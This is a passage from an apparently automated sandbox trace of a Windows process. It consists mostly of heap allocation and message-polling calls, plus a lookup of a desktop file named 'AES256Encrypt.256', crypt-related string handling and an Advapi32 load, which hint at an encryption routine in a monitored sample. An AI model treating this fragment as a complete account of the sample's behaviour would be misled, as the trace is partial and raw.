Flags=0x0, Size=0x10) returned 0x2e53bf0 [0134.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0134.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0134.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0134.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0134.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0134.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0134.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0134.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0134.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0134.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0134.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0134.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0134.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0134.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0134.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0134.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0134.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0134.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0134.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0134.526] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0134.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0134.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0134.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0134.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0134.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0134.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0134.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0134.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0134.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0134.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0134.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0134.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0134.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0134.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0134.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0134.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0134.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0134.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0134.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0134.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0134.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0134.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0134.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0134.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0134.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0134.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0134.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0134.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0134.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0134.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0134.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0134.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0134.527] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0134.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0134.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0134.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0134.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0134.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0134.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0134.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0134.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0134.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0134.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0134.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0134.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0134.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0134.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0134.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54800 | out: hHeap=0x970000) returned 1 [0134.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0134.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0134.528] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0134.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0134.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0134.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0134.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0134.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0134.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0134.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0134.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0134.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0134.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0134.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0134.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0134.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0134.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0134.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0134.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0134.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0134.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0134.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0134.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0134.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0134.529] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/AES256Encrypt.256", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd42cff4e, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd42cff4e, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd4368900, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x13800, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="AES256Encrypt.256", cAlternateFileName="AES256~1.256")) returned 0xa87550 [0134.529] FindClose (in: hFindFile=0xa87550 | out: hFindFile=0xa87550) returned 1 [0134.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0134.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0134.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0134.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0134.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0134.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0134.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0134.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0134.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0134.529] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0134.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0134.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0134.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0134.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0134.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0134.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0134.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0134.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0134.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0134.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0134.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0134.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0134.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0134.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0134.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0134.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0134.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0134.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0134.530] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0134.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0134.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0134.530] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0134.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545d0 | out: hHeap=0x970000) returned 1 [0134.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0134.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0134.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0134.530] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0134.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0134.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd88 [0134.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0134.530] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0134.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd88 | out: hHeap=0x970000) returned 1 [0134.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0134.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0134.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0134.531] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0134.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0134.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0134.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0134.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0134.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0134.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0134.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0134.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0134.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0134.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0134.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0134.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0134.531] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0134.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0134.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0134.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0134.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0134.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0134.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0134.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0134.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0134.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0134.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0134.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0134.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0134.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0134.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0134.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0134.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0134.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0134.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0134.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0134.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0134.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0134.532] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0134.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0134.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0134.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0134.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0134.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0134.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0134.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0134.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0134.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0134.532] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0134.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0134.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0134.532] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0134.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0134.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0134.532] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0134.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0134.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0134.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0134.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ba8 [0134.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0134.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0134.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0134.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0134.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0134.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0134.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0134.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0134.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0134.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0134.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0134.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0134.533] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0134.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0134.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0134.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0134.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0134.533] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0134.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0134.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0134.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0134.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0134.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0134.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0134.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0134.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0134.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0134.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0134.534] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0134.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0134.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0134.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0134.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0134.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0134.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0134.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0134.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0134.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0134.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0134.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0134.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0134.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0134.534] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0134.534] RtlAllocateHeap 